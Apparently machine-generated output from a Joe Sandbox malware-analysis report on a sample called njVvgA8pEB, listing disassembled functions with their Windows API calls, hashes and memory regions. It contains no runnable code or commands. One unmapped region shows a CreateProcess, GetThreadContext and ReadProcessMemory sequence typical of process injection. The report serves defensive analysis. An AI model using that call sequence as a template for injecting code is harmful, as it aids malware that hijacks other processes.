                                                                          • API String ID: 4104443479-4289271907
                                                                          • Opcode ID: 070ffcfc78f0340b77e1483ea5dfaf6a1b1ab7d264f9896f443cac541248c597
                                                                          • Instruction ID: 8f110875a49baef399264d6daf78ca9d8e2d3bd294ea78665648e1cd5f85a617
                                                                          • Opcode Fuzzy Hash: 070ffcfc78f0340b77e1483ea5dfaf6a1b1ab7d264f9896f443cac541248c597
                                                                          • Instruction Fuzzy Hash: CE414D72A0415867DF2F9B64E8A17FE7FA69B4D300F684475EC829F283D6209DC583A1
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 0034EA39
                                                                          • GetOpenFileNameW.COMDLG32(?), ref: 0034EA83
                                                                            • Part of subcall function 00314750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00314743,?,?,003137AE,?), ref: 00314770
                                                                            • Part of subcall function 00330791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003307B0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Name$Path$FileFullLongOpen_memset
                                                                          • String ID: X
                                                                          • API String ID: 3777226403-3081909835
                                                                          • Opcode ID: 2c9b2df2afd9de33bf9bd4e94b36a46d797c02ce24ffb43399ff234f8b60b371
                                                                          • Instruction ID: fad4a05975f6eb439ce88ed51b01f2fe26d50c37968b8c8b5272a903db8d524d
                                                                          • Opcode Fuzzy Hash: 2c9b2df2afd9de33bf9bd4e94b36a46d797c02ce24ffb43399ff234f8b60b371
                                                                          • Instruction Fuzzy Hash: C321C070A042589BCB079F98D845BEE7BFCAF48314F04441AE408EB241DBB45A898FA1
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: __fread_nolock_memmove
                                                                          • String ID: EA06
                                                                          • API String ID: 1988441806-3962188686
                                                                          • Opcode ID: 7c08e9d65569698bbf1189c8621e415e34c80df89faeaa6fb417336c1836a140
                                                                          • Instruction ID: 373962276a6d4e73d692c88e10916a9de03441b5e0c7a95ee45854c8f6c07eca
                                                                          • Opcode Fuzzy Hash: 7c08e9d65569698bbf1189c8621e415e34c80df89faeaa6fb417336c1836a140
                                                                          • Instruction Fuzzy Hash: 3D01F9719442187EDB29CBA8C856EEEBBF8DB11301F00419EF556D6181E978A6048B60
                                                                          APIs
                                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 003798F8
                                                                          • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0037990F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Temp$FileNamePath
                                                                          • String ID: aut
                                                                          • API String ID: 3285503233-3010740371
                                                                          • Opcode ID: d98c6326713e621dfc47af555e58720c96b573ac0758e6b42317a1e389b4dbca
                                                                          • Instruction ID: 8e1dd24e0b2cc811420081aa76b64a07141f32d3d1881b4db232873154649fb3
                                                                          • Opcode Fuzzy Hash: d98c6326713e621dfc47af555e58720c96b573ac0758e6b42317a1e389b4dbca
                                                                          • Instruction Fuzzy Hash: 73D05E7954030DAFDB519BA0DC0EFEA773CE704700F0006B2BA94D10A1EAB19A988B91
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fe0852a9fecb1a014f5f517ec707c96017c3524630dd6ab02a84fc326679b607
                                                                          • Instruction ID: 1c4f48b85269f67e3747c019a02a8269269792c5d5d859fc0fad09affccbd877
                                                                          • Opcode Fuzzy Hash: fe0852a9fecb1a014f5f517ec707c96017c3524630dd6ab02a84fc326679b607
                                                                          • Instruction Fuzzy Hash: 5CF15771A083409FCB15EF28C480A6ABBE5FF89314F14896EF9999B351D730E945CF92
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00314370
                                                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00314415
                                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00314432
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: IconNotifyShell_$_memset
                                                                          • String ID:
                                                                          • API String ID: 1505330794-0
                                                                          • Opcode ID: adc67e73c7bb16f4f0fb101ed548bb76c47af69fe79ef0625aa97160dbce41fb
                                                                          • Instruction ID: 91b8220d47465f70a766153fc354e1c78a7cc9dc0908b41c6a3e78671cf14c42
                                                                          • Opcode Fuzzy Hash: adc67e73c7bb16f4f0fb101ed548bb76c47af69fe79ef0625aa97160dbce41fb
                                                                          • Instruction Fuzzy Hash: 77313EB05057019FD726DF25E8846DBBBE8FB5C309F000D2EF59A86251E771A988CB52
                                                                          APIs
                                                                          • __FF_MSGBANNER.LIBCMT ref: 00335733
                                                                            • Part of subcall function 0033A16B: __NMSG_WRITE.LIBCMT ref: 0033A192
                                                                            • Part of subcall function 0033A16B: __NMSG_WRITE.LIBCMT ref: 0033A19C
                                                                          • __NMSG_WRITE.LIBCMT ref: 0033573A
                                                                            • Part of subcall function 0033A1C8: GetModuleFileNameW.KERNEL32(00000000,003D33BA,00000104,?,00000001,00000000), ref: 0033A25A
                                                                            • Part of subcall function 0033A1C8: ___crtMessageBoxW.LIBCMT ref: 0033A308
                                                                            • Part of subcall function 0033309F: ___crtCorExitProcess.LIBCMT ref: 003330A5
                                                                            • Part of subcall function 0033309F: ExitProcess.KERNEL32 ref: 003330AE
                                                                            • Part of subcall function 00338B28: __getptd_noexit.LIBCMT ref: 00338B28
                                                                          • RtlAllocateHeap.NTDLL(01130000,00000000,00000001,00000000,?,?,?,00330DD3,?), ref: 0033575F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                          • String ID:
                                                                          • API String ID: 1372826849-0
                                                                          APIs
                                                                          • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00379548,?,?,?,?,?,00000004), ref: 003798BB
                                                                          • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00379548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 003798D1
                                                                          • CloseHandle.KERNEL32(00000000,?,00379548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 003798D8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: File$CloseCreateHandleTime
                                                                          • String ID:
                                                                          • API String ID: 3397143404-0
                                                                          APIs
                                                                          • _free.LIBCMT ref: 00378D1B
                                                                            • Part of subcall function 00332D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00339A24), ref: 00332D69
                                                                            • Part of subcall function 00332D55: GetLastError.KERNEL32(00000000,?,00339A24), ref: 00332D7B
                                                                          • _free.LIBCMT ref: 00378D2C
                                                                          • _free.LIBCMT ref: 00378D3E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                          • String ID:
                                                                          • API String ID: 776569668-0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: CALL
                                                                          • API String ID: 0-4196123274
                                                                          APIs
                                                                          • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 012F953A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1723027581.00000000012F7000.00000040.00000020.00020000.00000000.sdmp, Offset: 012F7000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_12f7000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID: D
                                                                          • API String ID: 963392458-2746444292
                                                                          APIs
                                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 012F8C7D
                                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 012F8CA1
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 012F8CC3
                                                                          • TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 012F8FCC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1723027581.00000000012F7000.00000040.00000020.00020000.00000000.sdmp, Offset: 012F7000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_12f7000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Process$ContextCreateMemoryReadTerminateThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 572931308-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID:
                                                                          • API String ID: 4104443479-0
                                                                          APIs
                                                                          • IsThemeActive.UXTHEME ref: 00314834
                                                                            • Part of subcall function 0033336C: __lock.LIBCMT ref: 00333372
                                                                            • Part of subcall function 0033336C: DecodePointer.KERNEL32(00000001,?,00314849,00367C74), ref: 0033337E
                                                                            • Part of subcall function 0033336C: EncodePointer.KERNEL32(?,?,00314849,00367C74), ref: 00333389
                                                                            • Part of subcall function 003148FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00314915
                                                                            • Part of subcall function 003148FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0031492A
                                                                            • Part of subcall function 00313B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00313B68
                                                                            • Part of subcall function 00313B3A: IsDebuggerPresent.KERNEL32 ref: 00313B7A
                                                                            • Part of subcall function 00313B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,003D52F8,003D52E0,?,?), ref: 00313BEB
                                                                            • Part of subcall function 00313B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00313C6F
                                                                          • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00314874
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                          • String ID:
                                                                          • API String ID: 1438897964-0
                                                                          APIs
                                                                            • Part of subcall function 0033571C: __FF_MSGBANNER.LIBCMT ref: 00335733
                                                                            • Part of subcall function 0033571C: __NMSG_WRITE.LIBCMT ref: 0033573A
                                                                            • Part of subcall function 0033571C: RtlAllocateHeap.NTDLL(01130000,00000000,00000001,00000000,?,?,?,00330DD3,?), ref: 0033575F
                                                                          • std::exception::exception.LIBCMT ref: 00330DEC
                                                                          • __CxxThrowException@8.LIBCMT ref: 00330E01
                                                                            • Part of subcall function 0033859B: RaiseException.KERNEL32(?,?,?,003C9E78,00000000,?,?,?,?,00330E06,?,003C9E78,?,00000001), ref: 003385F0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                          • String ID:
                                                                          • API String ID: 3902256705-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: __lock_file_memset
                                                                          • String ID:
                                                                          • API String ID: 26237723-0
                                                                          APIs
                                                                            • Part of subcall function 00338B28: __getptd_noexit.LIBCMT ref: 00338B28
                                                                          • __lock_file.LIBCMT ref: 003353EB
                                                                            • Part of subcall function 00336C11: __lock.LIBCMT ref: 00336C34
                                                                          • __fclose_nolock.LIBCMT ref: 003353F6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                          • String ID:
                                                                          • API String ID: 2800547568-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
APIs
  • Part of subcall function 00314BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00314BEF
  • Part of subcall function 0033525B: __wfsopen.LIBCMT ref: 00335266
• LoadLibraryExW.KERNEL32(?,00000000,00000002,?,003D52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00314E0F
  • Part of subcall function 00314B6A: FreeLibrary.KERNEL32(00000000), ref: 00314BA4
  • Part of subcall function 00314C70: _memmove.LIBCMT ref: 00314CBA
Memory Dump Source
• Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
Similarity
• API ID: Library$Free$Load__wfsopen_memmove
• String ID:
• API String ID: 1396898556-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
APIs
• __lock_file.LIBCMT ref: 003348A6
  • Part of subcall function 00338B28: __getptd_noexit.LIBCMT ref: 00338B28
Memory Dump Source
• Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
Similarity
• API ID: __getptd_noexit__lock_file
• String ID:
• API String ID: 2597487223-0
APIs
• FreeLibrary.KERNEL32(?,?,003D52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00314E7E
Memory Dump Source
• Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
APIs
• GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003307B0
  • Part of subcall function 00317BCC: _memmove.LIBCMT ref: 00317C06
Memory Dump Source
• Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
Similarity
• API ID: LongNamePath_memmove
• String ID:
• API String ID: 2514874351-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
Similarity
• API ID: __fread_nolock
• String ID:
• API String ID: 2638373210-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
Similarity
• API ID: __wfsopen
• String ID:
• API String ID: 197181222-0
APIs
• Sleep.KERNELBASE(000001F4), ref: 012F9461
Memory Dump Source
• Source File: 00000000.00000002.1723027581.00000000012F7000.00000040.00000020.00020000.00000000.sdmp, Offset: 012F7000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_12f7000_njVvgA8pEB.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
APIs
• Sleep.KERNELBASE(000001F4), ref: 012F9461
Memory Dump Source
• Source File: 00000000.00000002.1723027581.00000000012F7000.00000040.00000020.00020000.00000000.sdmp, Offset: 012F7000, based on PE: false
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
APIs
  • Part of subcall function 00312612: GetWindowLongW.USER32(?,000000EB), ref: 00312623
• DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0039CB37
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0039CB95
• GetWindowLongW.USER32(?,000000F0), ref: 0039CBD6
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0039CC00
• SendMessageW.USER32 ref: 0039CC29
• _wcsncpy.LIBCMT ref: 0039CC95
• GetKeyState.USER32(00000011), ref: 0039CCB6
• GetKeyState.USER32(00000009), ref: 0039CCC3
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0039CCD9
• GetKeyState.USER32(00000010), ref: 0039CCE3
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0039CD0C
• SendMessageW.USER32 ref: 0039CD33
• SendMessageW.USER32(?,00001030,?,0039B348), ref: 0039CE37
• ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0039CE4D
• ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0039CE60
• SetCapture.USER32(?), ref: 0039CE69
• ClientToScreen.USER32(?,?), ref: 0039CECE
• ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0039CEDB
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0039CEF5
• ReleaseCapture.USER32 ref: 0039CF00
• GetCursorPos.USER32(?), ref: 0039CF3A
• ScreenToClient.USER32(?,?), ref: 0039CF47
• SendMessageW.USER32(?,00001012,00000000,?), ref: 0039CFA3
• SendMessageW.USER32 ref: 0039CFD1
• SendMessageW.USER32(?,00001111,00000000,?), ref: 0039D00E
• SendMessageW.USER32 ref: 0039D03D
• SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0039D05E
• SendMessageW.USER32(?,0000110B,00000009,?), ref: 0039D06D
• GetCursorPos.USER32(?), ref: 0039D08D
• ScreenToClient.USER32(?,?), ref: 0039D09A
• GetParent.USER32(?), ref: 0039D0BA
• SendMessageW.USER32(?,00001012,00000000,?), ref: 0039D123
• SendMessageW.USER32 ref: 0039D154
• ClientToScreen.USER32(?,?), ref: 0039D1B2
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0039D1E2
                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0039D20C
                                                                          • SendMessageW.USER32 ref: 0039D22F
                                                                          • ClientToScreen.USER32(?,?), ref: 0039D281
                                                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0039D2B5
                                                                            • Part of subcall function 003125DB: GetWindowLongW.USER32(?,000000EB), ref: 003125EC
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0039D351
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
